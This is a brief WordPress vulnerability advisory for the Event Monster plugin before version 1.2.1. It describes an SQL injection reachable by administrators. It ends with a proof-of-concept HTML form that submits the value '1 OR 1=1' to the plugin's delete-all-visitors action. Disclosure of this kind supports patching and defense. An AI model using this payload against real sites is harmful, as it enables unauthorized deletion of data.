WordPress Plugin Vulnerabilities

Event Monster < 1.2.1 - Admin+ SQLi

Description

The plugin does not validate and escape some parameters before using them in SQL statements, which could lead to SQL Injection exploitable by high privilege users

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/edit.php?post_type=awl_event_monster&page=em-visitors-page" method="POST">
      <input type="hidden" name="action" value="deleteallvisitor" />
      <input type="hidden" name="nonce" value="XXXXX" />
      <input type="hidden" name="id" value="1 OR 1=1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>